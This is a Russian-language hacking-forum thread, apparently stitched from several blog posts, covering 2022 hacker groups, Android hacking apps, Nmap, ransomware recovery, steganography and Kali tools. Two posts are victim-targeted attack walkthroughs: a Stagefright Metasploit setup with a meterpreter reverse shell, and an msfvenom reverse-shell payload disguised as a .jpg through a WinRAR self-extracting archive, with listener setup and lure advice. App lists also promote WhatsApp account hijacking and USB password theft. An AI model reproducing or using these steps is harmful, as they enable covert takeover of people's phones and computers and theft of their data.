По словам Uber, никакие общедоступные системы, учетные записи пользователей или какие-либо конфиденциальные карты, финансовые данные или информация о поездках не были скомпрометированы. Но кто же скажет правду.

2. Conti

Хотя группировка якобы была закрыта в мае 2022 года, часть банды вымогателей Conti взломали системы правительства Коста-Рики, запустили атаки DDoS на серверы Cobalt Strike и атаковали правительство Украины, а также другие украинские и европейские гуманитарные и некоммерческие организации на фоне войны с Россией. Conti раннее в этом году заявили, что поддерживают Россию.

В расследовании Google было указано, что фишинговые электронные письма Conti рассылались от имени правоохранительных органов Украины и содержали ссылку, которая призывала жертв загрузить обновление для своей операционной системы. При этом сама атака включала в себя внедрение банковского трояна IcedID для кражи персональных данных.

3. Lazarus Group

Северокорейская хакерская группировка Lazarus Group за этот год украла криптовалюту на 30 миллионов долларов, однако, правительство США позже конфисковало её.

В период с февраля по июль 2022 года Lazarus нацелились на ряд организаций в Канаде, Японии и США и, используя уязвимости в VMWare Horizon и вредоносное ПО, получили к ним доступ.

Группировка была частично раскрыта, но в техническом отчете говорится, что основная цель атаки «вероятно, заключалась в том, чтобы установить долгосрочный доступ к сетям жертв для проведения шпионских операций в поддержку целей правительства Северной Кореи… нацеливание на критически важную инфраструктуру и энергетические компании для установления долгосрочного доступа для кражи частной интеллектуальной собственности».

4. LockBit

В этом году LockBit подвергали стабильным ежемесячным атакам, при этом каждый месяц жертвами становились около 70 человек.

Согласно анализу данных, на LockBit приходилось 46 % всех случаев взлома, связанных с программами-вымогателями, в первой половине 2022 года. Только в июне 2022 года группировка была связана с 44 атаками, что делает ее самой крупной и опасной среди всех за этот год.

LockBit также потребовала выкуп в размере 10 миллионов долларов от Centre Hospitalier Sud Francilien во Франции после того, как в августе 2022 года нарушила работу программного обеспечения больницы, и из-за чего приостановилась работа нескольких медицинских организаций. Сами члены LockBit не взяли на себя ответственность за атаку. «ИТ-система в больничном центре была практически парализована», — сообщал в то время France24. Самих больных пришлось перенаправлять в другое место, так как персонал работал с ограниченными ресурсами.

5. REvil

Этой группировке принадлежит крупная атака программы-вымогателя на поставщика программного обеспечения для управления информационными технологиями Kaseya, а еще попытка вымогательства 11 миллионов долларов у глобальной пищевой компании JBS. Помимо этого, REvil украла гигабайты финансовых данных у китайской компании по производству бытовой техники под названием Midea Group.

После чего все считали, что группировка была разоблачена и закрыта. Однако, многие убеждены, что это была тщательно продуманная тактика, чтобы уйти в тень и замести следы после первоначальной масштабной атаки. Россия заявила об изъятии у REvil 426 миллионов рублей, включая криптовалюту на сумму около 40 миллионов рублей. Несмотря на это, группировка по-прежнему не отступает и продолжает свои атаки.

Заключение

Ни одна организация не может быть 100% защищена от нападения хакерских группировок. Как только злоумышленники получают доступ к внутренним сетям, обнаружить их становится практически невозможно. Будучи незамеченными, они наносят колоссальный ущерб не только коммерческим компаниям, но и, в том числе, обычным пользователям и даже медицинским организациям. Компании должны приложить усилия для лучшего мониторинга сети и быстрого реагирования на первые хакерские действия. Минимальные проверки небезопасных протоколов или устройств с интенсивным трафиком имеют решающее значение для обеспечения безопасности.

https://i.gyazo.com/3eba3be163c1c7bea1509c8b75efb384.jpg

Вступить в наш чат

Исследователем кибербезопасности из Zimperium была обнаружена уязвимость в Android, которая представляет собой тип атаки переполнения буфера. В этой статье речь пойдет о Stagefright. Этот удаленный эксплойт не требует никакой сложной работы, все что нужно сделать хакеру - это отправить вредоносную ссылку на файл, при нажатии на которую произойдет сбой: андроид будет взломан, а пользователь даже не догадается об этом. Сегодня мы покажем, как хакеры удаленно взламывают андроиды с помощью эксплойта Stagefright. Итак, приступим.

https://i.gyazo.com/631ce24a07c1f17e8d6d7e7a0eefed49.jpg

Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.

Взлом Android с эксплойтом Stagefright

Шаг 1: Загрузите Kali Linux.

Запустите свой компьютер с Kali Linux и откройте Metasploit.

Шаг 2: Настройте сервер Metasploit для использования эксплойта stagefright.

Чтобы настроить Metasploit, введите следующие команды в консоли msf:

use exploit/android/browser/stagefright_mp4_tx3g_64bit

set SRVHOST 192.168.182.136 (your IP here)

set URIPATH /

set payload linux/armle/meterpreter/reverse_tcp

set lhost 192.168.182.136 (здесь ваш IP)

set verbose true

exploit -j

https://i.gyazo.com/64b260ea33b07f27864919b9b1bde610.jpg

Шаг 3: Теперь, когда эксплойт запущен, отправьте вредоносную ссылку жертве.

В нашем случае ссылка такая: http://192.168.182.136:8080/

Шаг 4: Наслаждайтесь взломом.

Как только жертва нажмет на ссылку, ее телефон будет скомпрометирован. И вы сможете управлять им удаленно с помощью эксплойта stagefright.

Эта атака работает не на всех андроидах, только с устаревшем ПО.

Как защититься от этого хака?

Проверьте, не уязвимо ли ваше устройство. Для этого используйте приложение Norton для защиты от эксплойтов.

Обновите ваш телефон: эта уязвимость давно исправлена, убедитесь, что вы регулярно обновляете свое устройство.

Поменяйте телефон: не используйте устаревшие устройства, которые не обновлялись более года.

Google Play: устанавливайте приложения только из официального магазина игр. Не открывайте неизвестные ссылки и файлы, которым вы не доверяете.

Установите антивирус: дополнительная защита не повредит и всегда поможет быть начеку.

На этом все. Удачи!

https://i.gyazo.com/653098f3752157cbbf2c3f336af12d90.jpg

Вступить в наш чат

Приложения для взлома — один из самых популярных запросов в браузере и в Google Play. Иметь хакерские приложения прямо в телефоне желает каждый, но вряд ли поиски в Интернете приведут вас к желаемому результату. Итак, сегодня мы собрали для вас список лучших хакерских приложений для Android, которые понравятся даже опытному взломщику.

1. AndroRAT

https://i.gyazo.com/d4eed85708100d4902d170548215c4d7.jpg

AndroRAT — это приложение, разработанное на Java Android и представляющее собой смесь Android и RAT. Это инструмент удаленного доступа, используемый для дистанционного управления устройствами через компьютер. Он может похвастаться многими полезными функциями. AndroRAT умеет отслеживать сообщения и звонки, проверять историю браузера, делать снимки с камеры, отправлять текстовые сообщения, следить за активностью пользователя и собирать отчёт об установленных приложениях.

2. zANTI

https://i.gyazo.com/e7e7176c34787ba1d99d090bfbfe910b.jpg

ZANTI — это must have для вашей телефонной безопасности, даёт полное представление от уровне риска одним нажатием кнопки. Приложение разработано Zimperium и используется для тестирования на проникновение мобильных устройств, позволяет оценить угрозу и определить методы, которые может использовать злоумышленник для взлома вашего устройства. ZANTI также автоматически диагностирует уязвимости в мобильных устройствах или на веб-сайтах с помощью множества тестов на проникновение, включая атаку «человек посередине» (MITM), взлом паролей и Metasploit.

3. cSploit

https://i.gyazo.com/1e10ecb538be3a3b6fb84ed18f9e2781.png

cSploit — это набор инструментов для проникновения и анализа сети Android. После запуска cSploit вы сможете легко отобразить свою сеть, осуществлять взлом в систему многих протоколов TCP, выполнять атаки «человек посередине», перехватывать пароли и многое другое.

4. FaceNiff

https://i.gyazo.com/98c37011aafa5c56c8a948a76524412a.jpg

FaceNiff — это приложение для Android, которое позволяет вам сниффить и перехватывать данные через Wi-Fi, к которому подключен ваш телефон. Перехват сеансов возможен только тогда, когда Wi-Fi не использует EAP. Faceniff поддерживает такие сервисы, как Facebook, Twitter, YouTube, Amazon, ВКонтакте, Tumblr, MySpace и другие.

5. SSHDroid

https://i.gyazo.com/728e6c0da2da96cba771a50acd0bc7e6.jpg

SSHDroid — это реализация SSH, которую можно использовать для устройств Android. С помощью этого инструмента вы можете подключить свой телефон к компьютеру, а затем выполнить команду посредством SFTP, Nautilus (для Linux), WinSCP (для Windows) и Cyberduck (для Mac). Это одно из лучших приложений для взлома Android на рынке. У SSHDroid есть как бесплатная, так и премиум-версия. Приложение также обеспечивает безопасность и конфиденциальность пользователя.

6. Wi-Fi kill

https://i.gyazo.com/f36a9c077ef2b813146e2c54e9983db7.jpg

В наших прошлых статьях мы рассказывали о том, как хакнуть Wi-Fi и чем опасен такой взлом для вашей сети. Всякий раз, когда вы чувствуете, что ваш Wi-Fi не дает вам достаточно мощности, скорее всего кто-то другой использует его без вашего разрешения. Что ж, Wi-Fi kill — лучшее решение для незваных гостей. С помощью этого приложения вы сможете отследить и затем удалить всех пользователей, которые используют ваш Wi-Fi.

7. Hackode

https://i.gyazo.com/de53f4f40eb5c20ae32637bf6b44a834.jpg

Hackode — это приложение для Android, созданное для тестировщиков на проникновение, этичных хакеров, ИТ-администраторов и специалистов по кибербезопасности для выполнения различных задач, таких как OSINT-разведка, взлом Google, Google Dorks, Whois, сканирование, поиск DNS, IP, записей MX, DNS и так далее. Это приложение все еще находится в стадии бета-тестирования, но скоро оно станет официальным.

https://i.gyazo.com/c5d810e5440296881abe0a85582f64ad.jpg

Вступить в наш чат

Приложения для взлома — один из самых популярных запросов в браузере и в Google Play. Иметь хакерские приложения прямо в телефоне желает каждый, но вряд ли поиски в Интернете приведут вас к желаемому результату. Итак, сегодня мы собрали для вас топ-10 лучших хакерских приложений для Android, которые понравятся даже опытному взломщику.

Ознакомиться с первой частью подборки можно по ссылке (https://forum.antichat.xyz/threads/750994/post-331918).

1. Kali Linux NetHunter

https://i.gyazo.com/abd367ec4b6b0493bb4a8b18e86c2945.jpg

Мы не могли обойти стороной это приложение. Совместимость Kali NetHunter с устройствами Android позволила ему стать одним из первых и самых популярных ПО для тестирования на проникновение. Kali NetHunter имеет открытый исходный код. Приложение поставляется с несколькими функциями, включая SQL инъекцию, режим AP, атаки MITM и HID с клавиатуры. Kali NetHunter в основном работает как оверлей на вашем устройстве и собирает интернет-трафик.

2. DroidBox

https://i.gyazo.com/c663d6f1b715b279ccf29116b2344495.jpg

DroidBox - это карманный помощник для вашего устройства. Он даёт полный анализ всех приложений на Android. Помимо этого, его можно использовать для повышения эффективности работы вашего устройства: получения результатов, касающихся хэшей APK, SMS, телефонных звонков, сетевого трафика, потери информации по различным каналам и много другого.

3. Fing

https://i.gyazo.com/2a12a3395684b6c7696b47ee3cfd099f.jpg

Сетевой сканер Fing используется для обнаружения устройств, подключенных к сети Wi-Fi пользователя, а также для определения местоположения устройства. Кроме того, он обладает способностью обнаруживать злоумышленников, защищать сеть от любых киберрисков, устранять сетевые проблемы, обеспечивая наилучшую производительность сети.

4. USB Cleaver

https://i.gyazo.com/86d2e05a0ae348dfcc99d69c2983db3c.jpg

Приложение USB Cleaver обеспечивает быстрый сбор паролей с Windows. Если подключить андроид по USB-кабелю к компьютеру Windows, на котором активирована функция Autostart, то приложение автоматически соберет следующую информацию: пароли из браузеров (Firefox, Chrome, IE), пароль от WiFi, сетевую системную информацию. Все украденные данные будут хранится в защищенном zip-файле.

5. Droidsheep Guard

https://i.gyazo.com/f76a23b595d986587450a5ff15771404.jpg

Droidsheep Guard — это продвинутое приложение, которое легко и быстро защитит вас от нападок хакеров. Вы можете использовать его для безопасного просмотра в соц. сетях и Интернет-сёрфинга. Droidsheep Guard может защитить вас от атак типа «Человек посередине», таких как DroidSheep, Faceniff и т. д. Приложение также отправит вам предупреждающее сообщение о подозрительной активности и советы, как действовать в опасной ситуации.

6. Encrypt Decrypt Tools

https://i.gyazo.com/30f677f6f3a5a0c538c4b2ee9b6246e5.jpg

Как следует из названия, это приложение основано на шифровании данных и, следовательно, обеспечивает конфиденциальность пользователя. Это одно из лучших приложений для взлома Android на рынке. Вы можете защитить сообщение или данные, включив режим шифрования, а затем расшифровать их, когда захотите. Приложение будет полезным как для личного, так и для профессионального использования.

7. Whatscan

https://i.gyazo.com/85a15a3bda4dc709f06a7f68edf038f1.jpg

Whatscan — это сканер WhatsApp, который можно использовать для получения доступа к учетной записи WhatsApp любого человека. Если вы ищете какое-либо приложение, через которое можно взломать аккаунт WhatsApp другого пользователя, то это лучший вариант. Все, что вам нужно, это QR-код Вотсапа жертвы, чтобы начать.

8. PixelKnot

https://i.gyazo.com/f547d6a6020be090f3fc33b64443e65f.jpg

PixelKnot — это приложение для Android, которое можно использовать для скрытия текстовых сообщений с помощью фотографий для дальнейшей передачи. Приложение будет полезно для отправки секретных сообщений, таких как пароли или PIN-коды. Это простой и интересный способ шифрования данных. Риск разоблачения довольно невелик, поскольку никто не подозревает, что фото содержат секретные коды или что-то в этом роде.

9. NetCut

https://i.gyazo.com/beccd07bfa6a0f2d7846c708bb8ef1d3.jpg

NetCut — это бесплатное приложение для Android, которое используется для обнаружения сети, используемой в WiFi. Вы можете получить доступ к WiFi и пользоваться Интернетом, даже если ваше устройство имеет недействительный IP-адрес и ему не разрешен доступ в Интернет. Помимо этой функции, вы можете переназначить MAC-адрес и контролировать использование пропускной способности вашей сети.

10. WPS Connect

https://i.gyazo.com/48d3b206864e8b3af67b2f6d66f6b479.png

WPS Connect — это приложение, используемое для взлома сетей WiFi с включенным протоколом WPS. Он проверяет уязвимость маршрутизатора к любому ПИН-коду по умолчанию. Его можно использовать для взлома сети Wi-Fi абсолютно бесплатно.

https://i.gyazo.com/fb20b5dcd8562bfbd2f49b03df7d6e7b.jpg

Вступить в наш чат

Network Mapper - утилита, которую любят хакеры, системные администраторы и даже Голливуд (в фильме «Матрица» при взломе используется именно NMAP). В этой статье мы расскажем об этом бесплатном и необходимом инструменте, который вам точно понравится.

https://i.gyazo.com/206de6f922c06e2a43f6074d2146d159.jpg

NMAP — сетевой сканер, созданный Гордоном Лайоном, который помогает осуществлять анализ сети, сканировать ее и выявлять подключения. NMAP в процессе сканирования сети перебирает доступный диапазон портов и пытается подключиться к каждому из них. Если подключение успешно, то вы можете узнать версию программного обеспечения, открытые порты и даже найти уязвимости, которые затем можно использовать. В этом и заключается сила NMAP или Network Mapper. Программа совместима со всеми операционными системами, включая Windows, Mac и Linux. Мы же покажем его в действии на примере Kali Linux. Давайте приступим.

Мы не будем останавливаться на установке утилиты, информация об этом доступна в Интернете, перейдём сразу к работе NMAP.

Пингуем все доступные хосты в нашей сети

Итак, чтобы пропинговать устройство в любой сети, мы должны просто набрать следующую команду:

ping

https://i.gyazo.com/f052fe942930c75639ecc3ecf95f265a.png

Мы проверили, работает ли устройство или нет.

Но что, если мы хотим просканировать всю сеть и определить, какие устройства работают в нашей сети?

Предположим, что наша домашняя сеть — 192.106.54.2/24, что означает 254 конечных точек или хостов, доступных в нашей сети. Для обычного пользователя невозможно их всех проверить, что нельзя сказать про NMAP, которая сканирует всю сеть и показывает, какой хост работает. Для этого введём команду:

nmap -sP

https://i.gyazo.com/a436f5521b5edde59c86cc8155223744.png

Хакеру недостаточно знать лишь какие хосты работают, нужна дополнительная информация. Вторым шагом мы ищем открытые порты.

Проверка открытых портов

Допустим, мы хотим взломать веб-сайт и найти все конечные точки сети, на которых запущен этот сайт.

Что мы будем искать?

Обычно мы рассматриваем порты 80 или 443, так как они чаще всего открыты на сервере.

Для того, чтобы узнать наверняка используем следующую команду:

nmap -sT -p 80,443

https://i.gyazo.com/49df959ecf8f15419d33830065e12758.png

Здесь -sT — это тип сканирования портов, называемый TCP-соединением, которое выполняет трехстороннее рукопожатие и предоставляет нам эти результаты.

Режим скрытности NMAP

Какова цель этого режима?

Скрытый режим необходим, потому что в некоторых случаях команды NMAP могут действовать навязчиво, а меры безопасности, такие как брандмауэр или IDS, могут блокировать дальнейшее выполнение запроса. Именно поэтому, мы будем использовать следующую команду:

nmap -sS -p

https://i.gyazo.com/11d4227f35acbe2f28d245de73985ddc.png

Скрытое сканирование также известно как сканирование SYN, оно используется, чтобы избежать трехсторонних рукопожатий и брандмауэров для успешного завершения команды. Однако, сейчас нет полной уверенности, что вы все равно не попадёте в брандмауэры, используя метод скрытого сканирования.

Руководство по NMAP

Nmap имеет в своём арсенале большой набор функций, которые вы можете использовать для сканирования. Введите следующую команду, и программа предоставит вам весь список:

man nmap

Чтобы узнать, какую операционную систему использует ваша цель, просто напишите:

nmap -O

https://i.gyazo.com/2f6f27b54b692d9a58c829e2d36953da.png

Программа предоставит вам подробную информацию о системе вашей цели, а также сообщит, какие порты открыты.

NMAP-скрипты

У NMAP есть ещё одна мощная и гибкая функция — свой скриптовый движок, который позволит вам писать скрипты.

https://i.gyazo.com/725d677bb79a42a867c26cf9d84657ee.png

Перед нами представлены все категории подсистемы сценариев NMAP. Выберем, например, категорию под названием «vuln», которая является уязвимостью. Теперь, при сканировании системы с этой категорией, программа сообщит вам, какие порты открыты и укажет уязвимости, которые есть в системе.

Если вы узнаете об уязвимости в какой-либо системе, то просто можете воспользоваться этим и получить контроль над всей системой.

nmap --script

В категории «vuln» есть несколько скриптов, но хакер не может проверить каждый скрипт. Для этого можно просто ввести nmap --script vuln 10.13.1.82. NMAP будет пробовать каждый элемент в списке, пока не найдет фактическую уязвимость в системе. Этот пример был для скриптов в категории «vuln». Вы же можете сделать это с любой категорией, просто выполнив следующую команду:

nmap --script

Заключение:

Это был всего лишь краткий обзор NMAP. Мы рассмотрели сканирование портов NMAP и примеры использования данной программы. Но на самом деле NMAP имеет множество других функций сканирования, и если вы хотите их освоить, продолжайте экспериментировать. Практикуйтесь, и тогда результат не заставит себя ждать. Желаем успехов!

https://i.gyazo.com/75f2d2c41c5e79f35b15e23f8445df13.jpg

Вступить в наш чат

Да что может случится, если открыть картинку? На первый взгляд, ничего страшного. Но если вы прочтете эту статью, то узнаете, что именно таким простым способом можно получить полный контроль над компьютером жертвы, лишив её доступа к своим же собственным файлам. Да-да, и все это с помощью одной лишь картинки.

https://i.gyazo.com/3ce774b97a535524576a48b504aa89fa.jpg

Дисклеймер

Данная статья предназначена только для образовательных целей, не используйте ее во вред другим людям. Мы не несем ответственности за любые ваши действия.

Требования для взлома

Найдите любое изображение, которое понравится вашей жертве (мемы, котики, аниме);

Kali Linux, с помощью которого будет создаваться вредоносное ПО;

Второй компьютер с Windows, на который должен быть установлен WinRAR.

Создание полезной нагрузки

Для создания полезной нагрузки у вас должен быть установлен Kali Linux.

Прежде всего, откройте терминал, введите msfconsole и подождите, пока он загрузится.

Затем введите следующую команду, при этом обязательно проверьте свой IP-адрес и скопируйте его.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=555 -f exe -e x86/sikata_ga_nai -i 10 > .exe

https://i.gyazo.com/5b04e0f85fa12de2756addecf645cd98.png

После этой команды ваша полезная нагрузка будет создана.

Прикрепляем полезную нагрузку к картинке

Теперь переключитесь на компьютер с Windows, на котором уже установлен WinRAR.

Итак, у вас есть 2 файла, а именно файл картинки, которую вы скачали, и полезная нагрузка, которую мы создали.

Введите в браузере «icon maker» или перейдите по этой ссылке. После этого создайте иконку загруженной вами картинки.

Итого у вас уже есть все 3 файла, которые нам понадобятся, поэтому теперь выберите полезную нагрузку, картинку и щелкните их правой кнопкой мыши, затем нажмите «добавить в архив».

После этого последовательно выполните пункты:

Во вкладке «Общие» нажмите «Создать массив SFX»;

Кликнете по вкладке «Дополнительно» и выберите «Дополнительные параметры SFX»;

Далее во вкладке «Обновление» нажмите «Извлечь и обновить файлы»;

В «Настройках» вы увидите два пункта, а именно «Выполнить после извлечения» и «Выполнить перед извлечением»;

В пункте «Выполнить после извлечения» напишите полное имя файла изображения вместе с типом файла. Подтвердите и после этого напишите имя файла полезной нагрузки с типом файла;

Затем во вкладке «Текст и значок» снизу вы увидите «Загрузить значок SFX из файла», нажмите и выберите иконку, который вы создали из картинки;

Во вкладке «Режимы» нажмите «Скрыть все» и кликнете «ОК».

Теперь откроется окно WinRAR; там, во вкладке «Общие», измените имя на любое, которое вы хотите, а также укажите расширение, например, котики.jpg.

Готово! Вы успешно создали полезную нагрузку.

Теперь пришло время создать прослушиватель, который будет создавать отчет по запросам.

Создание прослушивателя

Откройте новый терминал и введите msfconsole после завершения загрузки;

Напишите «use multi/handler» —> «Enter»;

Затем введите «set payload windows/meterpreter/reverse_tcp» и нажмите Enter;

Введите «show options», чтобы увидеть, что требуется для настройки слушателя;

https://i.gyazo.com/f27d7b38adb4876961fdbdcf20c12c7f.png

Теперь он запросит LHOST и LPORT; напишите LHOST, который вы написали при создании полезной нагрузки, и то же самое касается LPORT.

Далее введите «выполнить» и нажмите «Enter».

Социальная инженерия

Все готово, и остаётся только подумать о том, как заставить жертву открыть вашу картинку. На самом деле, с изображением дела обстоят куда лучше, чем с ссылками, так как многие люди даже не подозревают, что за картинкой с мемом может скрываться вредоносный файл.

И наконец, как только ваша жертва откроет файл, вы получите запрос от вашего слушателя. Вы успешно взломали компьютер.

Этот метод возможен только в том случае, если жертва и вы подключены к одной и той же сети. Если вы хотите атаковать кого-то, кто не находится в вашей сети, вам придется изменить несколько параметров. Об этом поговорим в другой раз.

На этом все. Удачи!

https://i.gyazo.com/e1ed3b4b6b6a56745549db2466384bce.jpg

Вступить в наш чат

Представьте, что вам приходит сообщение от злоумышленника, в котором содержится вредоносное вложение с кодом, который скачивает программу-вымогатель, как только вы открываете файл. «И что происходит дальше?», - спросите вы. Программа-вымогатель просканирует важные файлы и зашифрует их так, что вы не сможете расшифровать их без ключа, за доступ к которому злоумышленник потребует выкуп. Вымогательское ПО наносит урон быстрее, чем любые другие вредоносные приложения.

Но не стоит впадать в панику, потому что сегодня мы расскажем вам, что вы должны делать, если подверглись нападению такой программы, и как впредь защитить свою систему от возможных атак.

https://i.gyazo.com/d22e49b967f122462c0181fbd598a617.png

Не следует сразу прибегать к профессиональной помощи или, что ещё хуже, идти на поводу злоумышленников и отправлять им деньги, потому что вы сами в состоянии справится с вторжением вредоносной программы. Просто следуйте нижеуказанным пунктам, и у вас все получится.

Заблокируйте свою сеть

Самое первое, что вы должны сделать, это изолировать зараженный компьютер от сети. Поскольку 90% кибератак зашифровывают сетевой жесткий диск, все другие устройства, подключенные к той же сети могут тоже пострадать.

Итак, вы должны включить брандмауэр, тем самым защититься от несанкционированного доступа или использовать самый традиционный метод — отключить ПК от розетки. В этой ситуации главное предотвратить дальнейшее распространение программы-вымогателя.

Не переносите новые файлы в зараженную систему

Никогда не переносите файлы в зараженный компьютер, так как существует множество программ-вымогателей, которые шифруют в режиме реального времени, поэтому любые новые файлы, которые вы переносите в систему, тоже подвергнутся атаке.

Это типичная ошибка, которую совершают многие люди, поскольку они думают, что атака уже завершена, и угроз больше нет, поэтому удаляют зараженные файлы и восстанавливают исходные файлы из резервной копии. Однако, все это приводит к шифрованию этих восстановленных файлов, потому что программа-вымогатель все еще активна.

Остановите работу программы

Вам необходимо избавиться от активного вредоносного ПО в системе, для этого вы можете прибегнуть к помощи антивируса. Но делать это нужно с особой осторожностью, потому что не каждый антивирус сможет локально удалить исполняемый файл, не тронув сами файлы или даже ключевой файл, навсегда их зашифровав. Будьте внимательны при запуске сканирования и не удаляйте никакие ключевые, текстовые файлы или заметки о выкупе, просто удалите исполняемый файл.

Вы, должно быть, подумали: «Это все, конечно, хорошо, но как я могу расшифровать свои файлы?».

Проверьте варианты расшифровки

Теперь самое время проверить, возможно ли самостоятельно расшифровать ваши файлы.

Поскольку исследователи безопасности взломали большое количество программ-вымогателей, они также создали расшифровщик, который находится в свободном доступе, так что скорее всего вы можете расшифровать зараженные файлы без уплаты выкупа.

Существует потрясающий сайт, который не только расскажет вам, какая у вас программа-вымогатель, но и даже даст вам ссылку для скачивания дешифратора.

Сайт называется ID Ransomware. Он бесплатный и очень простой в использовании.

https://i.gyazo.com/b471211ff14a20d5051a07cf5d3b8f24.jpg

Убедитесь, что у вас есть резервные копии

Если вы читаете дальше, то предыдущий шаг вам, к сожалению, не помог. Да, есть несколько программ-вымогателей, которые до сих пор невозможно взломать, и исследователи безопасности все еще работают над ними. Поэтому, если вы подверглись нападению таких программ-вымогателей, лучше удалите все файлы и перезагрузите систему, убедившись, что у вас есть резервная копия файлов.

Если у вас нет резервной копии, обязательно посетите эту страницу, заполните данные и отправьте. Вам пришлют письмо после того, как создадут дешифратор, который вернет ваши файлы. Это трудоемкий процесс, поэтому запаситесь терпением.

https://i.gyazo.com/dfc3455e269f63af46e1435ce0c85da2.jpg

Переговоры с нападающим

Если ждать не ваш вариант, и вам срочно нужны файлы, то вы всегда можете заплатить выкуп. Однако, мы не советуем этого делать, но и останавливать вас не имеем права. Единственное, что мы можем посоветовать, так это попробовать договориться с злоумышленниками, поскольку было замечено, что они часто снижают первоначальную цену.

Но даже если вы выплатите всю нужную сумму, нет никаких гарантий, что злоумышленники отправят вам подлинный дешифратор, а не какой-нибудь левый, который даже не запустится на вашем ПК. Итого: вы потратите деньги и останетесь ни с чем, поэтому оставьте эту затею и дождитесь помощи от команды ID Ransomware.

Вот мы и подошли к концу сегодняшней темы. Мы верим, что данная статья помогла вам противостоять атаке программ-вымогателей, и вы узнали, что делать, если вдруг вы подвергнитесь подобной атаке, что мы надеемся никогда не произойдет, но как гласит цитата на сайте ID Ransomware:

«Знание - половина победы».

https://i.gyazo.com/4b3a381f0ddb4c4c1c0919e3e41fef70.jpg

Вступить в наш чат

Стеганография — это метод, используемый для сокрытия файлов и конфиденциальных данных внутри изображения, чтобы их можно было передавать, не вызывая никаких подозрений. Этот метод является одним из основ криптографии, и в этой статье мы покажем вам, как скрыть файлы в фотографии или аудиозаписи с помощью Steghide и Kali Linux.

https://i.gyazo.com/73dbe91820f20ecba44d6ee2b14a4b22.jpg

Как зашифровать файлы в Kali Linux

Для начала давайте разберемся, как же все-таки работает стеганография.

Главная задача стеганографии - это спрятать файлы и данные внутри изображения так, чтобы сам факт их существования был скрыт. Для этого файлы шифруются с помощью ключа доступа, для расшифровки которого требуется другой ключ на стороне получателя. Таким образом, никто не сможет обнаружить то, что вы утаили, для просмотра данных человеку потребуется ключ дешифрования.

В процессе шифрования нам потребуется специальный инструмент Steghide, использующий код доступа для скрытия информации внутри изображений.

Особенности Steghide:

сжатие и шифрование встроенных данных;

поддержка файлов JPEG, BMP, WAV и AU (да, он поддерживает даже аудиофайлы).

Теперь, когда мы ознакомились с теоретической частью, можем начинать.

Шаг 1: Откройте терминал Kali Linux и клонируйте репозиторий steghide:

apt-get install steghide

Шаг 2: Загрузите изображение, в котором будете прятать файл.

Шаг 3: В терминале Kali Linux измените рабочий каталог на Desktop, используя следующую команду:

cd Desktop

Шаг 4: Убедитесь, что оба файла, то есть изображение JPG, и текстовый файл находятся в одном рабочем каталоге. В этом руководстве используется каталог Desktop. Вы можете выбрать любой.

https://i.gyazo.com/8e22bc5630f2cb4dc2bb7351901e7192.jpg

Мы скачали изображение и назвали его girl.jpg. Файл, который будем прятать — secret.txt.

Шаг 5: Введите steghide или steghide -h, чтобы отобразить все возможности инструмента.

Шаг 6: Теперь введите следующие команды, чтобы вставить наш файл в изображение с паролем:

https://i.gyazo.com/b5b2464b80ee89770f169cb918f42856.jpg

Шаг 7: Steghide запросит у вас кодовую фразу/пароль. Таким образом, вы можете ввести любой пароль, который вам нравится, а затем повторно ввести ту же фразу-пароль для подтверждения, нажав Enter.

Вы получите следующий вывод на своем терминале:

https://i.gyazo.com/81e9c2e48b7caa49c9082b073527bbf4.jpg

Шаг 8: Готово! Вы успешно спрятали файл в изображении.

Как расшифровать файл с помощью Kali Linux:

Шаг 1: Чтобы расшифровать файл, перейдите в свой терминал Kali Linux и введите следующую команду:

steghide extract -sf girl.jpg

https://i.gyazo.com/3f0f56918adbb05a0de6a934afa6c89b.jpg

Шаг 2: Теперь введите пароль/кодовую фразу, чтобы посмотреть файл. Вам нужен правильный пароль, иначе файл не откроется.

Поздравляем, вы изучили основы стеганографии и использования steghide в Kali Linux. Теперь вы можете скрыть файлы в изображениях и даже в аудиофайлах (принцип тот же), используя steghide.

https://i.gyazo.com/43173eeeaa6f03c5b8fac272b23ed937.jpg

Вступить в наш чат

Ищете инструменты, которые смогли бы автоматизировать и облегчить вашу работу? Вы попали точно по адресу, сегодня мы расскажем вам о топовых инструментах, которые способны значительно сэкономить время и порадовать своей эффективностью. Речь пойдет об инструментах, которые предустановлены вместе с Kali Linux. В Kali Linux включено более 500 инструментов, которые могут использоваться для взлома и тестирования на проникновение. Разбегаются глаза от всего этого многообразия? Остановитесь, ведь мы собрали для вас только лучшие из лучших.

Готовы? Тогда поехали!

https://i.gyazo.com/73258d4afead7185e017d659df36c10d.jpg

1. Burp Suite

Burp Suite — один из наиболее широко используемых инструментов тестирования безопасности веб-приложений.

Этот инструмент используется в качестве прокси, что означает, что все запросы от браузера прокси будут проходить через него. Поскольку запросы выполняются через Burp Suite, мы можем вносить изменения в запросы по мере необходимости. И эта функция делает этот инструмент полезным для тестирования уязвимостей, таких как XSS, SQLI и других проблем, связанных с Интернетом.

Существует бесплатная версия, которая поставляется с предустановленной Kali Linux, но есть также и премиум-версия под названием Burp Suite Professional, которая имеет гораздо больше функций.

Как использовать Burp Suite?

Чтобы использовать Burp Suite, выполните следующие действия:

Загрузите ПК с Kali Linux.

Откройте терминал.

Введите там следующее, чтобы запустить «Burp Suite»: burpsuite

https://i.gyazo.com/8dc65dfa75bfb6956d9a4613447c4d7b.png

2. Nmap

Nmap, также известный как Network Mapper, — очень простой инструмент сканирования с открытым исходным кодом в Kali Linux. Этот инструмент позволяет нам сканировать систему или сеть; сначала он отправляет пакеты на компьютер хоста, а затем анализирует ответ, чтобы получить желаемый результат.

Инструмент Nmap — один из лучших и наиболее широко используемых инструментов для сканирования и тестирования на проникновение.

Как использовать NMAP?

Чтобы использовать NMAP, выполните следующие действия:

Загрузите ПК с Kali Linux.

Откройте терминал.

Введите следующее, чтобы запустить «NMAP»: nmap

Подробнее об этом инструменте читайте в нашей авторской статье по ссылке (https://forum.antichat.xyz/threads/750994/post-332197).

https://i.gyazo.com/0689ff3d79a72dbd180f6cd51e6b4e3d.png

3. Wireshark

Wireshark — один из самых известный инструментов Kali Linux. Его еще обычно называют «сниффером сети»; подразумевается, что он перехватывает и анализирует пакеты. Этот инструмент используется для сетевого анализа, который необходим для безопасности. Он способен анализировать данные, отправляемые по сети в виде пакетов. Каждый пакет имеет подробную информацию, которая включает в себя источник, IP-адрес, время передачи, тип используемого протокола и другие данные. Эти файлы имеют расширение «pcapp», которые могут быть проанализированы только Wireshark.

Как использовать Wireshark?

Чтобы запустить и использовать Wireshark, сделайте следующее:

